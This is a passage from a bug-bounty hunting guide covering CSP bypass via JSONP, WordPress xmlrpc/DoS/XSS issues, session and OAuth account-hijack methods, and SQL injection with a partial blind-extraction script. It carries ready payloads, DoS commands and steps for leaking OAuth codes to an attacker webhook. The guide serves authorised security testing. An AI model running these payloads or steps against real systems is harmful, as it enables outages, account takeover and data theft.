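def parse_csp(header: str) -> Dict[str, List[str]]:
    """'a b; c d' -> {'a': ['b'], 'c': ['d']}. Directive names are lower-cased and
    a repeated directive is ignored: browsers honour only the first occurrence."""
    policy: Dict[str, List[str]] = {}
    for chunk in header.split(";"):
        parts = chunk.split()
        if parts:
            policy.setdefault(parts[0].lower(), parts[1:])
    return policy


def effective(policy: Dict[str, List[str]], directive: str) -> List[str]:
    """Fetch directives fall back to default-src; absent both, anything is allowed."""
    return policy.get(directive, policy.get("default-src", ["*"]))


def _host(source: str) -> str:
    """'https://x.com/path' -> 'x.com'; keywords such as 'self' come back unchanged."""
    return source.split("//")[-1].split("/")[0]


def audit_csp(header: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing obvious."""
    p = parse_csp(header)
    findings: List[str] = []
    script = [s.lower() for s in effective(p, "script-src")]
    if "script-src" not in p and "default-src" not in p:
        findings.append("no script-src and no default-src: script loading is unrestricted")
    has_nonce_or_hash = any(s.startswith(("'nonce-", "'sha")) for s in script)
    if "'unsafe-inline'" in script and not has_nonce_or_hash:
        findings.append("script-src allows 'unsafe-inline' without nonce/hash: reflected XSS runs")
    if "'unsafe-eval'" in script:
        findings.append("script-src allows 'unsafe-eval'")
    for s in script:
        host = _host(s)
        if s in ("*", "http:", "https:") or host.startswith("*."):
            findings.append(f"script-src wildcard {s}: attacker-hosted script loads")
        elif host in JSONP_HOSTS:
            findings.append(f"script-src trusts {host}, which serves JSONP: ?callback= gives JS execution")
        elif s.startswith("data:"):
            findings.append("script-src allows data: URIs: <script src=data:...> runs")
    if effective(p, "object-src") != ["'none'"]:
        findings.append("object-src is not 'none': plugin-based script injection possible")
    if "base-uri" not in p:
        findings.append("base-uri missing: an injected <base href> retargets relative script URLs")
    return findings


def csp_injection_findings(header_template: str, user_value: str) -> List[str]:
    """The page's CSP-injection case: user input reflected into the header, with
    '{input}' marking the reflection point. Reports every directive the attacker
    ends up controlling. Because the first occurrence of a directive wins, an
    injection point placed before object-src can override it; one after it cannot."""
    baseline = parse_csp(header_template.replace("{input}", ""))
    injected = parse_csp(header_template.replace("{input}", user_value))
    out: List[str] = []
    for name, sources in injected.items():
        if name not in baseline:
            out.append(f"new directive injected: {name} {' '.join(sources)}")
        elif sources != baseline[name]:
            out.append(f"{name} now reads: {' '.join(sources)}")
    return out
```

Run `audit_csp` on every policy you meet; the page's own example policy passes everything except the missing `base-uri`, which is the usual gap. For a suspected CSP injection, put `{input}` where your value is reflected and feed `csp_injection_findings` the payloads you intend to send, to see what the browser would end up enforcing.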

Example JSONP endpoint:

```plaintext
https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)
```

If the policy includes `accounts.google.com` in `script-src` and the attacker controls a parameter that ends up as a script source, the page can be made to load the endpoint and execute the callback:

```plaintext
something.example.com?vuln_param=https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)
```

The resulting `<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)">` passes the `script-src` check, and the response body `alert(1337)` executes, bypassing CSP. Check every host in `script-src` for JSONP endpoints, and for open redirects: after a redirect CSP matches only the origin, not the path, so a redirect on a whitelisted host can also lead to an attacker-controlled script.

---

### 3. CSP Injection

CSP injection occurs when user-controlled input is reflected into the CSP header itself. Consider the following URL:

```plaintext
example.com?vuln=something_vuln_csp
```

If the value of `vuln` is inserted into the header unescaped, the attacker controls part of the policy:

```plaintext
script-src something_vuln_csp;
object-src 'none';
base-uri 'none';
require-trusted-types-for 'script';
report-uri https://csp.example.com;
```

By supplying a host of their own as the `script-src` value, the attacker permits external JavaScript from that host, and a `;` in the input ends the directive and lets them append new ones. Because browsers honour only the first occurrence of a directive name, an injection point that comes before `object-src` or `base-uri` in the header can also override them (`;object-src *`), whereas directives placed before the reflection point cannot be changed this way.

---

## Author

For further information or discussions, feel free to reach out to:

- **[@harsha0x01](https://twitter.com/harsha0x01)**

---

*Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
--------------------------------------------------------------------------------
/CMS/wordpress.md:
--------------------------------------------------------------------------------
# Wordpress Common Misconfiguration
Here I will try my best to cover all the common WordPress security misconfigurations I have seen before or that are officially referenced.
I will be attaching all PoCs and references as well.

# Index
* Wordpress Detection
* General Scan Tool
* xmlrpc.php
* Directory listing
* CVE-2018-6389
* CVE-2021-24364
* WP Cron DoS
* WP User Enumeration

# Wordpress Detection
If you are reading this you already know about technology detection tools and methods. Still, for completeness:
* Wappalyzer
* WhatRuns
* BuiltWith

Without a tool, the `/wp-login.php`, `/wp-admin/`, `/wp-content/` and `/wp-json/` paths and the `generator` meta tag give WordPress (and often its version) away.

# General Scan Tool
* WPScan

# xmlrpc.php
This is one of the most common findings on WordPress. To get paid for it you have to exploit it fully and show the impact properly; an enabled `xmlrpc.php` on its own is usually informational.

### Detection
* Visit `site.com/xmlrpc.php`
* A GET returns the error message `XML-RPC server accepts POST requests only.`

### Exploit
* Intercept the request and change the method from GET to POST (`Content-Type: text/xml`).
* List all methods:
```xml
<?xml version="1.0"?>
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>
```
* Check whether the `pingback.ping` method is present in the response.
* Pingback DDoS: every call makes the WordPress server fetch the source URL, so a list of WordPress sites can be used to flood a third party. Do not run this against anything you are not authorised to test; a single pingback to a host you control is enough evidence.
```xml
<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://<third-party-host>:<port>/</string></value></param>
    <param><value><string>http://<wordpress-site>/<existing-post>/</string></value></param>
  </params>
</methodCall>
```
* SSRF (internal port scan only): the first parameter is fetched by the WordPress server, so point it at an internal address and compare the fault code/string and the response time per port.
```xml
<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://<internal-ip>:<port>/</string></value></param>
    <param><value><string>http://<wordpress-site>/<existing-post>/</string></value></param>
  </params>
</methodCall>
```
### Tool To Automate XMLRPC-Scan.

[XMLRPC-Scan](https://github.com/nullfil3/xmlrpc-scan)

### References
[Bug Bounty Cheat Sheet](https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html)

[Medium Writeup](https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32)

[WpEngine Blog Post](https://wpengine.com/resources/xmlrpc-php/)

# Directory listing
Developers sometimes forget to disable directory listing on `/wp-content/uploads`, so this is a common finding on WordPress sites.

### Detection
Browse to `/wp-content/uploads/` (and the year/month subfolders beneath it); an `Index of` page means listing is enabled.

### Pro tip
Add this path to your fuzzing wordlist.

### References
[H1 Report](https://hackerone.com/reports/201984)
[H1 Report](https://hackerone.com/reports/762118)
[H1 Report](https://hackerone.com/reports/789388)
[H1 Report](https://hackerone.com/reports/448985)

# CVE-2018-6389
This issue can take down any WordPress site below 4.9.3 (the CVE lists WordPress through 4.9.2), so before reporting make sure the target runs such a version. The cause is `load-scripts.php`, which concatenates every JavaScript file named in its `load[]` parameter without authentication, so a single request makes the server read and return a very large amount of data.

### Detection
Use the URL from the loadsxploit gist; you will get a massive JavaScript blob in the response.

[loadsxploit](https://gist.github.com/remonsec/4877e9ee2b045aae96be7e2653c41df9)

### Exploit
You can use any DoS tool; Doser is fast and took the web server down within 30 seconds in testing. Only run it with explicit permission, and stop as soon as the impact is demonstrated.

[Doser](https://github.com/quitten/doser.py)
```
python3 doser.py -t 999 -g 'https://site.com/fullUrlFromLoadsxploit'
```
### References
[H1 Report](https://hackerone.com/reports/752010)

[CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389)

[Blog Post](https://baraktawily.blogspot.com/2018/02/how-to-dos-29-of-world-wide-websites.html)

# CVE-2021-24364
The Jannah WordPress theme before 5.4.4 did not properly sanitise the `options` JSON parameter of its `tie_get_user_weather` AJAX action before outputting it back in the page, leading to reflected Cross-Site Scripting (XSS).

### Detection and Exploit
* Append this to your target WordPress site's URL:
```
/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D
```
* Wait for the pop-up!

### Reference
[NVD](https://nvd.nist.gov/vuln/detail/CVE-2021-24364)

# WP Cron DoS
This is another place to perform a DoS attack. `wp-cron.php` runs WordPress's scheduled tasks and is normally triggered by page loads; requesting it directly and repeatedly makes the server run the scheduler on every hit.

### Detection
* Visit `site.com/wp-cron.php`
* You will see a blank page with HTTP status 200

### Exploit
You can use the same Doser tool for this:
```
python3 doser.py -t 999 -g 'https://site.com/wp-cron.php'
```
Many programs treat DoS as out of scope, so check the policy before running this.
### Reference

[GitHub Issue](https://github.com/wpscanteam/wpscan/issues/1299)

[Medium Writeup](https://medium.com/@thecpanelguy/the-nightmare-that-is-wpcron-php-ae31c1d3ae30)

# WP User Enumeration
This is only accepted when the target hides its users or they are not otherwise public; the usernames feed password brute forcing and other attacks.

### Detection
* Visit `site.com/wp-json/wp/v2/users/`
* You will see JSON user data in the response (`/?author=1` is the older variant: it redirects to the author archive and reveals the login name)

### Exploit
If `xmlrpc.php` and user enumeration are both present, chain them: collect usernames from `wp-json` and brute-force them through `xmlrpc.php`. The `wp.getUsersBlogs` method takes only a username and password, and `system.multicall` packs many attempts into one request, so the login page's rate limiting and CAPTCHA are often not in the way. This shows extra effort and increases the impact.

### Reference
[H1 Report](https://hackerone.com/reports/356047)

# Researcher Note
Please do not depend on these issues alone. I see people looking only for these and nothing else. They are worth a look while testing for other vulnerabilities, and most of the time they work well chained with other low-severity bugs.
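An added example for the xmlrpc.php and WP User Enumeration sections above; it is not code from the page or from WordPress. It builds the XML-RPC calls used in those sections (`system.listMethods`, `pingback.ping`, `wp.getUsersBlogs`) with the standard library, checks a `system.listMethods` response for `pingback.ping`, and extracts usernames from a `/wp-json/wp/v2/users/` body. No network calls are made: the responses are constructed samples in the shape xmlrpc.php and the REST API return, and `PINGBACK_SOURCE` / `PINGBACK_TARGET` are placeholders.

```python
"""Build and parse WordPress XML-RPC traffic with the standard library only.

Added example for the xmlrpc.php and WP User Enumeration sections; not code
from the page or from WordPress. No network calls are made: the responses below
are constructed samples, and every URL is a placeholder.
"""
import json
import xmlrpc.client

# Placeholders: the internal host:port you want the WordPress server to probe,
# and any existing post on the target (pingback.ping requires a real target post).
PINGBACK_SOURCE = "http://10.0.0.5:8080/"
PINGBACK_TARGET = "https://site.com/?p=1"


def list_methods_request() -> str:
    """<methodCall> for system.listMethods: the detection step. POST it as text/xml."""
    return xmlrpc.client.dumps((), methodname="system.listMethods")


def pingback_request(source: str, target: str) -> str:
    """<methodCall> for pingback.ping(sourceURI, targetURI). WordPress fetches
    sourceURI to verify that it links to targetURI: the SSRF / port-scan primitive."""
    return xmlrpc.client.dumps((source, target), methodname="pingback.ping")


def login_probe_request(username: str, password: str) -> str:
    """wp.getUsersBlogs takes only credentials, which makes it the usual brute-force
    method; form-based rate limiting and CAPTCHA plugins often do not cover it."""
    return xmlrpc.client.dumps((username, password), methodname="wp.getUsersBlogs")


def parse_call(xml: str):
    """(method name, params) from a <methodCall>; used to check what we built."""
    params, method = xmlrpc.client.loads(xml)
    return method, params


def methods_from_response(xml: str) -> list:
    """Parse a system.listMethods <methodResponse> into the list of method names."""
    (methods,), _ = xmlrpc.client.loads(xml)
    return list(methods)


def pingback_exposed(xml: str) -> bool:
    return "pingback.ping" in methods_from_response(xml)


def usernames_from_wp_json(body: str) -> list:
    """/wp-json/wp/v2/users/ returns a JSON array; 'slug' is the user_nicename,
    which defaults to the login name, so it is what you feed the brute force."""
    return [user["slug"] for user in json.loads(body)]


# Constructed samples (shape matches real xmlrpc.php / REST output).
SAMPLE_LIST_METHODS_RESPONSE = xmlrpc.client.dumps(
    (["system.listMethods", "system.multicall", "pingback.ping", "wp.getUsersBlogs"],),
    methodresponse=True,
)
SAMPLE_WP_JSON_USERS = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin"},
    {"id": 2, "name": "Content Editor", "slug": "editor"},
])


if __name__ == "__main__":
    print(list_methods_request())
    print("pingback.ping exposed:", pingback_exposed(SAMPLE_LIST_METHODS_RESPONSE))
    print("usernames:", usernames_from_wp_json(SAMPLE_WP_JSON_USERS))
```

To use it against a real target, POST the strings these functions return to `/xmlrpc.php` with `Content-Type: text/xml` and pass the response body to `methods_from_response`; for the port scan, vary the port in `PINGBACK_SOURCE` and compare the fault strings and timings you get back.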

# Author
**Name:** Mehedi Hasan Remon

**Handle:** [@remonsec](https://twitter.com/remonsec)
--------------------------------------------------------------------------------
/Broken_Auth_And_Session_Management/Session_based_bugs.md:
--------------------------------------------------------------------------------
# Broken Authentication And Session Management.

### Old Session Does Not Expire After Password Change:
* Steps:
```
1. Create an account on your target site.
2. Log in to the same account in two browsers (Chrome and Firefox, or a normal and an incognito window).
3. Change your password in Chrome. After the change succeeds, refresh the logged-in page in Firefox/incognito.
4. If you are still logged in there, the application does not invalidate other sessions on password change. This is a bug.
```
`Impact:` A user who changes their password because they suspect compromise cannot lock out an attacker who already holds a session.

### Session Hijacking (Intended Behavior)
* Steps:
```
1. Create your account.
2. Log in to your account.
3. Use a cookie editor extension in the browser.
4. Copy all the target's cookies.
5. Log out of your account.
6. Paste those cookies back in the cookie editor.
7. Refresh the page. If you are logged in again, the session was not invalidated server-side on logout.
```
`Impact:` If an attacker obtains a victim's cookies (through XSS, malware or network capture), they lead to account takeover even after the victim logs out. Obtaining the cookies is a precondition, which is why many programs rate this low or treat it as intended behaviour.

### Password reset token does not expire (Insecure Configurability)
* Steps:
```
1. Create your account on the target site.
2. Request a forgot-password link.
3. Don't use that link.
4. Instead, log in with your old password and change your email to another address.
5. Now use the reset link sent to the old email and check whether you can still change the password. If yes, this is a small bug.
```

### Server security misconfiguration -> Lack of security headers -> Cache control for a security page
* Steps :
```
1. Log in to the application.
2. Navigate around the pages.
3. Log out.
4. Press Back (Alt+Left Arrow).
5. If you are still "logged in" or can view the pages the user navigated, you found a bug.
```
`Impact:` At an internet cafe, if a person views a page with a lot of details and logs out, the next person can press Back (because the browser was not closed) and see the cached page; user information is leaked. The fix is `Cache-Control: no-store` on authenticated responses.

### Broken Authentication To Email Verification Bypass (P4) :
`category` : P4 >> Broken Authentication and Session Management >> Failure to Invalidate Session >> On Password Reset and/or Change

* Steps To Reproduce:
```
1) Create an account; you receive an email verification link.
2) In this case the application gives fewer privileges and features while the account is unverified.
3) Log in to the application and change the email address to Email B.
4) A verification link is sent to Email B; verify it.
5) Now change the email back to the address entered at account creation.
6) The profile shows the original email as verified.
7) Email verification is bypassed: the link sent at account creation was never used, yet the email is marked verified.
8) No new verification code was sent when changing back, and the profile shows a verified email.
```

`Impact` :
Email verification was bypassed because of a broken verification mechanism, so an attacker can obtain a more privileged account, leaving the site open to further attacks.
Happy Hacking:)

### Email Verification Bypass (P3/P4)
* Steps :
```
1) Create an account with your own email address.
2) After creating the account, a verification link is sent to you.
3) Don't use the verification link. Change your email to the victim's email.
4) Now go to your mailbox and click your own verification link.
5) If the victim's email gets verified, this is a bug.
```
`Impact` : Email verification bypass

### Old Password Reset Token Not Expiring Upon Requesting New One (Sometimes P4) :
* Steps :
```
1) Create an account with a valid email address.
2) Log out and navigate to the Forgot Password page.
3) Request a password reset link for your account; a link is sent to your mailbox.
4) Without using it, request a second password reset link.
5) Now use the first reset link rather than the second one and change your password.
6) If you can change your password, this is a small bug.
```
* Note: some companies won't accept it as a valid issue.

### Password Reset Token Not Expiring After Password Change (P4):
* Steps :
```
1) Create an account with a valid email address.
2) Log out and navigate to the Forgot Password page.
3) Request a password reset link for your account.
4) Use the link to change the password, then log in.
5) Now use the old reset link to change the password again.
6) If you can change your password again, this is a small bug.
```

### Insufficient account process validation leads to account takeover (P3/P4):
* Steps :
```
1) Create an account on the website.
2) Go to the profile section, change your details in the name parameter and, before saving, open Burp Suite, turn the proxy on and click Save.
3) Capture the request in Burp Suite and send it to the Repeater tab.
4) Log out from the website and go back to Burp Suite.
5) Change the email and name parameters and click "Go" in Repeater.
6) You receive a 200 OK response from the server.
7) Log in to your account and check the profile section to confirm the change was applied.
```
The root cause is a session that is not invalidated on logout (the replayed cookie still works), combined with an email change that needs no verification.

* Thanks for reading, happy hunting :).

## Resources:
Google, YouTube.

## Authors
* [https://twitter.com/Virdoex_hunter](https://twitter.com/Virdoex_hunter)
* Linkedin : [@chirag_Agrawal](https://www.linkedin.com/in/chirag-agrawal-770488144/), Twitter : [@Raiders](https://twitter.com/ChiragA15977205)
* Twitter : [Fani Malik](https://twitter.com/fanimalikhack)
* Linkedin : [@suprit-pandurangi](https://www.linkedin.com/in/suprit-pandurangi-a90526106/)
--------------------------------------------------------------------------------
/OAuth/OAuth 2.0 Hunting Methodology.md:
--------------------------------------------------------------------------------
## OAuth 2.0 Hunting Methodology
The two OAuth grant types you meet in web sign-in flows are:
- Authorization code flow
- Implicit flow

Note: *the implicit flow is deprecated by the OAuth 2.0 Security Best Current Practice because it exposes the access token in the browser, so an application still using it is a good place to look. The authorization code flow keeps the token exchange server-to-server and is harder to attack from the browser, but the `state` and `redirect_uri` bugs in Method-2 and Method-3 below apply to both flows.*

## How to differentiate between implicit and authorization code grant type

### Authorization code grant type

**Authorization request**
- The client application sends the browser to the OAuth service's `/authorization` endpoint, asking for permission to access specific user data.

> Note: the endpoint name varies between providers (`/auth`, `/oauth/authorize`, etc.), but you can identify it by the parameters used.

- The request in the authorization code flow looks like:

```
GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1
Host: oauth-authorization-server.com
```

- In the authorization code grant type the `response_type` parameter is `code`. The code the user brings back is what the client exchanges for an access token.

- After the user logs in to their account with the OAuth provider and consents to the requested access, they are redirected to the `/callback` endpoint given in the `redirect_uri` parameter. The resulting `GET` request carries the authorization code as a query parameter.

**Authorization code grant**

```
GET /callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1
Host: client-app.com
```

- The rest (exchanging the code for an access token at the token endpoint and the API calls that use it) happens server-to-server, so you do not see it in your proxy.

```md
**factors that determine authorization code flow:**
- Initial authorization request has `response_type=code`
- the `/callback` request contains the authorization code as a query parameter.
```

### Implicit grant type

**Authorization request**
- The implicit flow starts in much the same way as the authorization code flow. The only major difference is that the `response_type` parameter is set to `token`.
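An added example that is not part of the original methodology or of any OAuth library: it performs the grant-type classification this section describes (by `response_type`, and by whether `/callback` carries a code in the query or a token in the fragment) and flags the three things the methods further down hunt for: implicit flow, a missing `state`, and a `redirect_uri` that is not exactly the registered one. `REGISTERED_REDIRECTS` is an assumed client registration, and the lax/strict checks model a typical `redirect_uri` validation bug and its fix; the URLs follow the page's own `client-app.com` / `oauth-authorization-server.com` examples.

```python
"""Classify an OAuth 2.0 authorization request and flag the issues this page hunts.

Added example for this page; not part of the original methodology or any OAuth
library. REGISTERED_REDIRECTS is an assumed client registration; the sample
URLs follow the page's client-app.com / oauth-authorization-server.com examples.
"""
from typing import List
from urllib.parse import parse_qs, urlsplit

REGISTERED_REDIRECTS = {"https://client-app.com/callback"}   # assumption


def _query(url: str) -> dict:
    return parse_qs(urlsplit(url).query)


def grant_type(auth_url: str) -> str:
    """response_type=code -> authorization code flow, token -> implicit flow."""
    rt = _query(auth_url).get("response_type", [""])[0]
    return {"code": "authorization_code", "token": "implicit"}.get(rt, "other")


def callback_artifact(callback_url: str) -> dict:
    """What the /callback URL carries: a code in the query string (code flow) or an
    access token in the fragment (implicit flow; the fragment never reaches the server)."""
    parts = urlsplit(callback_url)
    query, fragment = parse_qs(parts.query), parse_qs(parts.fragment)
    if "code" in query:
        return {"kind": "authorization_code", "value": query["code"][0],
                "state": query.get("state", [None])[0]}
    if "access_token" in fragment:
        return {"kind": "access_token", "value": fragment["access_token"][0],
                "state": fragment.get("state", [None])[0]}
    return {"kind": "none", "value": None, "state": None}


def lax_redirect_check(requested: str) -> bool:
    """The common bug: match only the registered origin as a string prefix. It accepts
    https://client-app.com.attacker.net/ and https://client-app.com/callback/../x."""
    origins = {r.split("/callback")[0] for r in REGISTERED_REDIRECTS}
    return any(requested.startswith(origin) for origin in origins)


def strict_redirect_check(requested: str) -> bool:
    """The fix: exact string comparison against the registered redirect URIs."""
    return requested in REGISTERED_REDIRECTS


def audit_authorization_request(auth_url: str) -> List[str]:
    """Findings worth following up, keyed to the methods in this page."""
    q = _query(auth_url)
    findings: List[str] = []
    if grant_type(auth_url) == "implicit":
        findings.append("implicit flow: check whether the client validates the access token (Method-1)")
    if not q.get("state", [""])[0]:
        findings.append("no state parameter: the login/linking flow is CSRF-able (Method-2)")
    redirect = q.get("redirect_uri", [""])[0]
    if redirect and not strict_redirect_check(redirect):
        verdict = "accepted by a prefix match" if lax_redirect_check(redirect) else "not registered"
        findings.append(f"redirect_uri {redirect} is {verdict}: try leaking the code/token (Method-3)")
    return findings
```

Paste the authorization request you find in Burp's HTTP history into `audit_authorization_request`, and the `/callback` URL into `callback_artifact`; the lax/strict pair is the behaviour to probe on the server side, since a server that only prefix-matches `redirect_uri` is exactly what Method-3 exploits.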

```
GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=token&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1
Host: oauth-authorization-server.com
```

**Access Token grant**

- If the user logs in and consents to the requested access, the OAuth service redirects to the `/callback` endpoint, but instead of a query parameter carrying an authorization code it sends the access token and related data in the URL fragment. The fragment never reaches the server in the request; the client-side JavaScript reads it.

```
GET /callback#access_token=z0y9x8w7v6u5&token_type=Bearer&expires_in=5000&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1
Host: client-app.com
```

```md
**factors that determine Implicit flow:**
- Initial authorization request has `response_type=token`
- the `/callback` request carries the access token in the URL fragment.
```

---

*Now that you have determined which grant type the OAuth service uses, you can proceed to find bugs.*

### Method-1 (Auth bypass in OAuth implicit flow)
- To log the user in with OAuth, the client application sends a POST request to its own server containing user info (email, username) and the access token, and gets a session cookie back.
- Find that POST request in the HTTP history: it carries the user info and the access token.
- If the server does not validate the access token with the provider, or does not check that the token belongs to the claimed user, you can change the email and/or username parameters to impersonate another user and bypass authentication.

### Method-2 (Forced profile linking)
- This is a CSRF attack on the account-linking flow, so the impact depends on what a linked social profile grants (often: login as the victim).
- When you sign in with or link a social media profile, you are redirected to the social media site and log in there with those credentials.
- The next time you log in, you are logged in instantly; capture this request with Burp.
- In the HTTP history there will be a request similar to `/auth?client_id[...]` whose `redirect_uri` sends the authorization code to something like `/oauth-linking`. Check whether the `state` parameter is present. If it is not, the flow is vulnerable to CSRF, because the server has no way to tie the callback to the session that started the flow.
- The absence of `state` in this request is itself a finding.
- From here you can complete the OAuth flow on the victim's behalf and attach your social media profile to their account:
- Copy the URL of the `/oauth-linking` request (the one carrying your code) in Burp and drop the request so that the code is not consumed.
- Turn off intercept and log out of the website.
- Send this link to the victim, or embed it in an iframe on your website (`<iframe src="[the copied URL]"></iframe>`) and deliver your site's link to the victim.
- When the victim's browser loads the `iframe`, it completes the OAuth flow using your social media profile, attaching it to the victim's account. Authorization codes are single-use and short-lived, so generate the code right before delivery.

### Method-3 (Account hijacking via redirect_uri)
- Complete the OAuth sign-in flow, log out, then log back in; this time you are logged in instantly.
- Find the most recent authorization request in the HTTP history; it looks like `GET /auth?client_id=[...]`.
- Check the `redirect_uri` parameter and try to change it. If you can redirect to an external site, good; if not, try different endpoints on the same website (other paths, path traversal such as `/callback/../other`, extra subdomains) and see whether any are accepted.
- If one of the accepted endpoints has an open redirect, set `redirect_uri` so that it chains through it to your webhook.site URL and follow the redirect.
- Check for a log entry on webhook.site containing an authorization code.
- You can now send the request URL to the victim (or use an iframe as above) with `redirect_uri` set to your webhook and leak their authorization codes.
- If the victim opens the link, the authorization code appears in your webhook.site logs.
- Use the stolen code in the callback request; the rest of the OAuth flow completes automatically and you are logged in as the victim (the admin user in this scenario).

## Author:
[Pyr0sec](https://twitter.com/Pyr0sec)

--------------------------------------------------------------------------------
/SQLi/SQL_Injection.md:
--------------------------------------------------------------------------------
# SQL Injection
Here are some quick methods to detect SQL injection. They are not exhaustive; there are many other tricks and tools.

# Methods To Find SQLi

## 1. Using Burp Suite :
```
1. Capture the request with Burp Suite.
2. Send the request to Burp Scanner.
3. Run an active scan.
4. When the scan finishes, look for any SQL injection issue it reports.
5. Confirm it manually with SQL injection payloads (a scanner finding is a lead, not proof).
6. Use sqlmap to speed up exploitation.
```
## 2. Using waybackurls and a few other tools :
```
1. sublist3r -d target | tee -a domains    (findomain, assetfinder, etc. work too)
2. cat domains | httpx | tee -a alive
3. cat alive | waybackurls | tee -a urls
4. gf sqli urls >> sqli
5. sqlmap -m sqli --dbs --batch
6. Use tamper scripts if a WAF blocks the default payloads.
```
* More details in the source thread: [https://twitter.com/El3ctr0Byt3s/status/1302706241240731649](https://twitter.com/El3ctr0Byt3s/status/1302706241240731649)

## 3. Using a heuristic scan to find hidden parameters :
```
1. Run subdomain enumeration on the domain.
2. Gather all URLs with hakrawler, waybackurls and gau for the domain and its subdomains.
3. You can reuse the pipeline from method 2 here.
4. Use Arjun to scan the URLs for hidden parameters.
5. Pass the URL list with the --urls flag so every URL is scanned.
6. Check each discovered parameter as https://domain.com?PARAM=
7. Save the request to a file and process it with sqlmap (sqlmap -r request.txt).
```
## 4. Error generation with untrusted input or special characters :
```
1. Submit a single quote (') and look for database errors in the response.
2. Submit DBMS-specific syntax (a comment sequence, a string-concatenation expression) and see whether it is evaluated.
3. Submit boolean conditions such as ' OR 1=1 and ' OR 1=0 and compare the application's responses.
4. Submit payloads that cause a time delay and compare response times against a baseline.
```
# Post-Methods
## 1. Finding the total number of columns with ORDER BY, GROUP BY or HAVING :
```
Submit a series of ORDER BY clauses such as

' ORDER BY 1 --
' ORDER BY 2 --
' ORDER BY 3 --

incrementing the column index until an error occurs: the last index that works is the column count.
(On MySQL the comment sequence needs a trailing space, "-- ", or use "#" instead.)
```
## 2. Finding vulnerable columns with the UNION operator :
```
Submit a series of UNION SELECT payloads.

' UNION SELECT NULL --
' UNION SELECT NULL, NULL --
' UNION SELECT NULL, NULL, NULL --

(Using NULL maximizes the probability that the payload will succeed, because NULL can be converted to every commonly used data type.
The first payload that returns without an error confirms the column count; then replace one NULL at a time with a string to see which columns are reflected in the page.
On Oracle every SELECT needs a FROM clause, so append FROM dual.)
```
* For these methods in more detail, go through the PortSwigger site.

https://portswigger.net/web-security/sql-injection/union-attacks

## 3. Extracting basic information like database(), version(), user(), UUID() with concat() or group_concat()

### 1. Database version
```
Oracle      SELECT banner FROM v$version
            SELECT version FROM v$instance

Microsoft   SELECT @@version

PostgreSQL  SELECT version()

MySQL       SELECT @@version
```
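The column-count, UNION and extraction steps above (Post-Methods 1 to 3, together with the boolean-condition probe from Method 4) are easiest to see end to end against a throwaway target. What follows is an added example written for this page, not code from the original author: it builds a constructed SQLite database behind a lookup that concatenates input straight into the query, and drives it through a `send()` callable that stands in for an HTTP request returning a status code and body. The payloads use SQLite's dialect (`||` for concatenation where MySQL has `concat_ws()`, `sqlite_version()` for `@@version`, `sqlite_master` for `information_schema.tables`); the table, users and credentials are invented.

```python
import re
import sqlite3


# Constructed target: an in-memory SQLite database behind a lookup that builds
# the query with string formatting, i.e. the bug the page is hunting.
def build_target():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER, username TEXT, email TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "admin@example.test", "s3cret"),
        (2, "bob", "bob@example.test", "hunter2"),
    ])
    return con


def vulnerable_lookup(con, user_input):
    """Behaves like a web endpoint: (200, rows) on success, (500, error) on a SQL error.
    The SELECT exposes two columns; that is what the ORDER BY / UNION probes discover."""
    sql = f"SELECT username, email FROM users WHERE id = '{user_input}'"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, f"Database error: {exc}"
    return 200, "\n".join(f"{u}:{m}" for u, m in rows)


# Post-method 1: ORDER BY n works while n <= column count; the first failure gives the count.
def find_column_count(send, max_cols=20):
    for n in range(1, max_cols + 1):
        status, _ = send(f"' ORDER BY {n}-- ")
        if status != 200:
            return n - 1
    return None


# Post-method 2: UNION SELECT NULL,... with a marker in one column at a time; the columns
# whose marker shows up in the body are the ones we can read data through.
def find_reflected_columns(send, ncols):
    reflected = []
    for i in range(ncols):
        marker = f"zz{i}zz"
        cols = ["NULL"] * ncols
        cols[i] = f"'{marker}'"
        status, body = send(f"' UNION SELECT {', '.join(cols)}-- ")
        if status == 200 and marker in body:
            reflected.append(i)
    return reflected


# Post-method 3: pull any expression (or scalar subquery) through a reflected column, wrapped
# in delimiters so it can be cut out of whatever surrounds it. SQLite concatenates with ||.
def extract(send, ncols, col, expression):
    cols = ["NULL"] * ncols
    cols[col] = f"'<<' || ({expression}) || '>>'"
    status, body = send(f"' UNION SELECT {', '.join(cols)}-- ")
    if status != 200:
        return None
    m = re.search(r"<<(.*?)>>", body, re.S)
    return m.group(1) if m else None


# Method 4 (boolean conditions): when nothing is reflected, extract one character at a time
# by asking true/false questions and comparing the body with a known-true baseline.
def blind_extract(send, expression, max_len=32):
    _, true_body = send("1' AND 1=1-- ")
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # binary search over the code point of character `pos`
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr(({expression}), {pos}, 1)) > {mid}"
            _, body = send(f"1' AND {cond}-- ")
            if body == true_body:
                lo = mid + 1
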